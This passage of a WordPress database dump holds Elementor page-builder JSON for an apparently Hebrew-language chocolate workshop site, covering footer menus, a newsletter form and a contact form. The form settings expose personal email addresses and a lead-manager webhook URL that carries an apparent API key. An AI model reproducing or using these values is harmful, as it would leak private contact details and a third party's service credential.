\\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(257,67,'_elementor_template_type','page'),(258,67,'_elementor_edit_mode','builder'),(259,67,'_wp_page_template','default'),(260,67,'_elementor_data','[{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(261,65,'_elementor_version','0.4'),(262,46,'_elementor_data','[{\"id\":\"e6a36e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"56533f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b6e992\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4 \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3U4\",\"header_size\":\"h1\",\"align\":\"right\",\"title_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41a38a9\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"tel\",\"required\":\"true\",\"field_label\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_size\":\"md\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"yaaripe@gmail.com\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e6\\u05d5\\u05e8 \\u05e7\\u05e9\\u05e8 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"button_background_color\":\"#692910\",\"submit_actions\":[\"email\",\"redirect\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34828&lm_key=3fd3e41540f344c6af1c5864dadedc98\",\"selected_button_icon\":{\"value\":\"fas fa-envelope\",\"library\":\"fa-solid\"},\"button_icon_indent\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"redirect_to\":\"https:\\/\\/www.chocolate4u.co.il\\/thanks\\/\",\"__fa4_migrated\":{\"selected_button_icon\":true}},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false}]'),(263,68,'_wp_page_template','elementor_canvas'),(264,68,'_elementor_edit_mode','builder'),(265,68,'_elementor_data','[{\"id\":\"6cdfedca\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"6625c0b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\"